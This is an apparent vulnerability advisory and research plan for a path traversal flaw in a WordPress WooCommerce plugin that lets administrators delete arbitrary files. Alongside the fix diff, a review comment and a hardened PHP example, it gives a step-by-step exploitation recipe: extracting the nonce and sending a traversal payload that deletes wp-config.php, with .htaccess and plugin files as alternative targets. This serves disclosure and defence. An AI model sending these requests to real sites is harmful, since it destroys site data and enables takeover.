ilGhera Carta Docente for WooCommerce <= 1.5.0 - Authenticated (Administrator+) Path Traversal to Arbitrary File Deletion via 'cert' Parameter
Description
The ilGhera Carta Docente for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.5.0 via the 'cert' parameter of the 'wccd-delete-certificate' AJAX action. This is due to insufficient file path validation before performing a file deletion. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, such as wp-config.php, which can make site takeover and remote code execution possible.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
Technical Details
Affected versions: <= 1.5.0
What Changed in the Fix
Changes introduced in v1.5.1
Source Code
WordPress.org SVN
Vulnerability Research Plan: CVE-2026-2421 - Arbitrary File Deletion in ilGhera Carta Docente for WooCommerce
1. Vulnerability Summary
The ilGhera Carta Docente for WooCommerce plugin (versions <= 1.5.0) contains a path traversal vulnerability in its certificate deletion functionality. Specifically, the delete_certificate_callback function in includes/class-wccd-admin.php takes a filename from the cert POST parameter and concatenates it with a base directory constant (WCCD_PRIVATE) before passing it directly to unlink().
While the input is passed through sanitize_text_field(), this WordPress function does not remove directory traversal sequences (e.g., ../). An authenticated Administrator can exploit this to delete any file the PHP process has permission to remove, including the critical wp-config.php file.
2. Attack Vector Analysis
- Endpoint: /wp-admin/admin-ajax.php
- Action: wccd-delete-certificate
- Vulnerable Parameter: cert (POST)
- Required Parameters:
  - action: wccd-delete-certificate
  - wccd-delete: any value, must be set
  - delete-nonce: a valid CSRF nonce for the action wccd-del-cert-nonce
  - cert: path traversal payload (e.g., ../../../wp-config.php)
- Authentication Level: Administrator (the manage_options capability is required to access the settings page where the nonce is generated, and the AJAX action is registered within the WCCD_Admin class).
- Preconditions: The plugin must be active. WooCommerce must be active.
3. Code Flow
- Entry Point: In includes/class-wccd-admin.php, the __construct() method registers the AJAX action:
    add_action( 'wp_ajax_wccd-delete-certificate', array( $this, 'delete_certificate_callback' ), 1 );
- Logic Trigger: The function delete_certificate_callback() is invoked.
- Nonce Check: The code verifies a nonce named wccd-del-cert-nonce passed via delete-nonce:
    if ( isset( $_POST['wccd-delete'], $_POST['delete-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete-nonce'] ) ), 'wccd-del-cert-nonce' ) ) {
- Input Acquisition: The cert parameter is retrieved:
    $cert = isset( $_POST['cert'] ) ? sanitize_text_field( wp_unslash( $_POST['cert'] ) ) : '';
- Vulnerable Sink: If $cert is not empty, it is concatenated with WCCD_PRIVATE and deleted:
    unlink( WCCD_PRIVATE . $cert );
- Path Resolution: WCCD_PRIVATE is defined in wc-carta-docente.php relative to the WordPress uploads directory: wp-content/uploads/wccd-private/. Traversal starts here.
4. Nonce Acquisition Strategy
The nonce is localized specifically for the plugin's settings page in the WordPress admin dashboard.
- Navigate to the Settings Page: The plugin registers its settings page at admin.php?page=wccd-settings (as a submenu of woocommerce).
- Extracting the Nonce: The nonce is passed to the frontend using wp_localize_script() in wc-carta-docente.php:
    wp_localize_script(
        'wccd-admin-scripts',
        'wccdData',
        array(
            'delCertNonce' => $delete_nonce,
            'addCatNonce'  => $add_cat_nonce,
        )
    );
- Browser Execution:
  - Use browser_navigate to go to /wp-admin/admin.php?page=wccd-settings.
  - Use browser_eval to extract the nonce: window.wccdData?.delCertNonce.
5. Exploitation Strategy
The goal is to delete wp-config.php to force WordPress into a setup state, or simply to demonstrate arbitrary file deletion.
- Setup User: Create an Administrator user (if not already logged in).
- Get Nonce: Follow the strategy in Section 4 to obtain a valid delCertNonce.
- Determine Traversal Depth: WCCD_PRIVATE is wp-content/uploads/wccd-private/.
  - To reach the root (where wp-config.php resides), the traversal is ../../../wp-config.php: wccd-private/ -> .. -> uploads/ -> .. -> wp-content/ -> .. -> root.
- Send Exploitation Request:
  - Tool: http_request
  - Method: POST
  - URL: [TARGET_URL]/wp-admin/admin-ajax.php
  - Body (URL-encoded): action=wccd-delete-certificate&wccd-delete=1&delete-nonce=[NONCE]&cert=../../../wp-config.php
  - Headers: Content-Type: application/x-www-form-urlencoded
6. Test Data Setup
- Plugin Activation: Ensure wc-carta-docente and woocommerce are installed and activated.
- Target File: Ensure wp-config.php exists (standard for WP) or create a canary file for safer testing:
    wp eval "file_put_contents(ABSPATH . 'canary.txt', 'pwned');"
- Traversal to Canary: If using canary.txt, the cert parameter should be ../../../canary.txt.
7. Expected Results
- The AJAX request will likely return 200 OK or 0 (as it calls exit; immediately after processing).
- The target file (e.g., wp-config.php or canary.txt) will be removed from the server filesystem.
- If wp-config.php is deleted, navigating to the homepage will redirect to wp-admin/setup-config.php.
8. Verification Steps
- Check Filesystem: Use WP-CLI to check if the file still exists:
    wp eval "echo file_exists(ABSPATH . 'canary.txt') ? 'exists' : 'deleted';"
  Or check wp-config.php directly (if in a shell):
    ls /var/www/html/wp-config.php
- Check Site State: Attempt to access the site; a missing wp-config.php triggers the WordPress installation screen.
9. Alternative Approaches
- Deletion of .htaccess: If wp-config.php is protected by filesystem permissions, try deleting .htaccess (../../../.htaccess) to break site routing.
- Plugin Deletion: Delete the main plugin file to disable security checks: ../../wc-carta-docente.php.
- WCCD_PRIVATE Discovery: If the standard traversal depth fails, it may be because the uploads folder has been moved. Verify the constant value to confirm the starting directory:
    wp eval "echo WCCD_PRIVATE;"
Summary
The ilGhera Carta Docente for WooCommerce plugin is vulnerable to arbitrary file deletion due to a path traversal flaw in its certificate management logic. An authenticated Administrator can use directory traversal sequences like '../../' in the 'cert' parameter to delete critical server files such as wp-config.php, potentially leading to site takeover.
Vulnerable Code
// includes/class-wccd-admin.php @ 1.5.0

/**
 * Deletes the certificate
 *
 * @return void
 */
public function delete_certificate_callback() {
    if ( isset( $_POST['wccd-delete'], $_POST['delete-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete-nonce'] ) ), 'wccd-del-cert-nonce' ) ) {
        // sanitize_text_field() strips tags and control characters but leaves "../" intact.
        $cert = isset( $_POST['cert'] ) ? sanitize_text_field( wp_unslash( $_POST['cert'] ) ) : '';

        if ( $cert ) {
            // Vulnerable sink: no check that the concatenated path stays inside WCCD_PRIVATE.
            unlink( WCCD_PRIVATE . $cert );
        }
    }

    exit;
}
Security Fix
@@ -81,11 +81,15 @@ if ( isset( $_POST['wccd-delete'], $_POST['delete-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete-nonce'] ) ), 'wccd-del-cert-nonce' ) ) { - $cert = isset( $_POST['cert'] ) ? sanitize_text_field( wp_unslash( $_POST['cert'] ) ) : ''; + $cert = isset( $_POST['cert'] ) ? sanitize_file_name( wp_unslash( $_POST['cert'] ) ) : ''; if ( $cert ) { - unlink( WCCD_PRIVATE . $cert ); + $file_path = realpath( WCCD_PRIVATE . $cert ); + + if ( $file_path && 0 === strpos( $file_path, realpath( WCCD_PRIVATE ) ) ) { + unlink( $file_path ); + } } } @@ -1,7 +1,7 @@ === ilGhera Carta Docente for WooCommerce === Contributors: ghera74 Tags: WooCommerce, payment gateway, Carta Docente, Carte Cultura, 18app -Stable tag: 1.5.0 +Stable tag: 1.5.1 Requires at least: 4.0 Tested up to: 6.9 License: GPLv3 @@ -76,6 +76,11 @@ == Changelog == += 1.5.1 = +Data di rilascio: 13 Marzo, 2026 + + * Sicurezza: Corretto path traversal nella cancellazione certificato (CVE-2026-2421) + = 1.5.0 = Data di rilascio: 4 Febbraio, 2026 @@ -6,8 +6,8 @@ * Author: ilGhera * * @package wc-carta-docente - * Version: 1.5.0 - * Stable tag: 1.5.0 + * Version: 1.5.1 + * Stable tag: 1.5.1 * Author URI: https://ilghera.com * Requires at least: 4.0 * Tested up to: 6.9 @@ -33,7 +33,7 @@ define( 'WCCD_URI', plugin_dir_url( __FILE__ ) ); define( 'WCCD_INCLUDES', WCCD_DIR . 'includes/' ); define( 'WCCD_INCLUDES_URI', WCCD_URI . 'includes/' ); - define( 'WCCD_VERSION', '1.5.0' ); + define( 'WCCD_VERSION', '1.5.1' ); /*Main directory di upload*/ $wp_upload_dir = wp_upload_dir();
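Review bot: in the first hunk the containment check "0 === strpos( $file_path, realpath( WCCD_PRIVATE ) )" compares the resolved path against the base directory without a trailing separator, so any resolved path that merely begins with the same string (for example a sibling directory named wccd-private-backup, reached through a symlink placed inside wccd-private) would pass; compare against "realpath( WCCD_PRIVATE ) . DIRECTORY_SEPARATOR" instead. Because WCCD_PRIVATE ends in a slash and sanitize_file_name() strips path separators, that case is hard to reach in this code, but the separator makes the check correct independently of those two facts. Also worth a one-line comment at "$file_path &&": realpath() returns false for a missing target, so that guard is what turns a non-existent or dangling path into a silent no-op instead of a PHP warning from unlink().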
Exploit Outline
The exploit targets the 'wccd-delete-certificate' AJAX action. An authenticated Administrator first retrieves a valid CSRF nonce ('wccd-del-cert-nonce') from the plugin's settings page by accessing the localized 'wccdData' object in the browser. Using this nonce, the attacker sends a POST request to '/wp-admin/admin-ajax.php' with the 'action' set to 'wccd-delete-certificate' and the 'cert' parameter containing a directory traversal payload (e.g., '../../../wp-config.php'). Because the plugin fails to validate that the resulting path is contained within the intended directory before calling unlink(), the targeted file is deleted from the filesystem.
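The fix combines two controls: reduce the user-supplied value to a bare file name, then resolve the result with realpath() and confirm it still sits under the private directory. The following is an added example, not the plugin's code, of a self-contained PHP routine that applies both controls in a form that does not depend on WordPress (no sanitize_file_name(), no WCCD_PRIVATE; the $private_dir argument plays that role) and adds the trailing-separator prefix comparison and a symlink refusal. The temporary directory, the canary.txt and cert.pem names and the link.pem symlink are constructed for the self-test; a POSIX filesystem with symlink support is assumed.

```php
<?php
// Added example (not from the ilGhera plugin): a hardened "delete a file that
// lives inside a private directory" routine plus a self-test against traversal
// and symlink inputs. $private_dir stands in for WCCD_PRIVATE (assumption).

/**
 * Delete $user_supplied_name from $private_dir only if the resolved path stays
 * inside $private_dir. Returns true when a regular file was unlinked, false
 * when the request was refused or nothing matched.
 */
function safe_delete_in_dir(string $private_dir, string $user_supplied_name): bool
{
    // 1. Keep only the final path component: "../../../x" becomes "x".
    //    This is the same effect sanitize_file_name() has on separators.
    $name = basename($user_supplied_name);
    if ($name === '' || $name === '.' || $name === '..') {
        return false;
    }

    $candidate = rtrim($private_dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $name;

    // 2. Refuse symlinks outright so a link inside the directory cannot be used
    //    to reach a file elsewhere (realpath() would follow it).
    if (is_link($candidate)) {
        return false;
    }

    // 3. Canonicalise both sides. realpath() returns false for a missing path,
    //    which makes a non-existent target a harmless no-op.
    $base   = realpath($private_dir);
    $target = realpath($candidate);
    if ($base === false || $target === false) {
        return false;
    }

    // 4. Containment check with a trailing separator, so a sibling directory
    //    such as "wccd-private-backup" cannot satisfy a bare-prefix comparison.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return false;
    }

    // 5. Only regular files are eligible; never unlink a directory entry.
    if (!is_file($target)) {
        return false;
    }

    return unlink($target);
}

/** Build a constructed layout in the temp dir, run the checks, clean up. */
function run_self_test(): array
{
    $root    = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'safe-delete-' . bin2hex(random_bytes(4));
    $private = $root . DIRECTORY_SEPARATOR . 'wccd-private';
    mkdir($private, 0700, true);
    file_put_contents($root . DIRECTORY_SEPARATOR . 'canary.txt', 'keep me');       // outside
    file_put_contents($private . DIRECTORY_SEPARATOR . 'cert.pem', 'certificate'); // inside
    symlink($root . DIRECTORY_SEPARATOR . 'canary.txt', $private . DIRECTORY_SEPARATOR . 'link.pem');

    $results = [
        'traversal rejected'  => safe_delete_in_dir($private, '../canary.txt') === false,
        'symlink rejected'    => safe_delete_in_dir($private, 'link.pem') === false,
        'canary still exists' => file_exists($root . DIRECTORY_SEPARATOR . 'canary.txt'),
        'legit file deleted'  => safe_delete_in_dir($private, 'cert.pem') === true,
        'legit file gone'     => !file_exists($private . DIRECTORY_SEPARATOR . 'cert.pem'),
    ];

    // Remove the constructed layout.
    @unlink($private . DIRECTORY_SEPARATOR . 'link.pem');
    @rmdir($private);
    @unlink($root . DIRECTORY_SEPARATOR . 'canary.txt');
    @rmdir($root);

    return $results;
}

foreach (run_self_test() as $check => $ok) {
    echo str_pad($check, 22) . ($ok ? 'PASS' : 'FAIL') . PHP_EOL;
}
```

Run it with "php safe_delete.php"; every line should print PASS. The order of the checks matters: is_link() is evaluated on the unresolved candidate before realpath() follows the link, and the prefix comparison is done on the canonical path with a separator appended, which is the one detail the shipped fix omits.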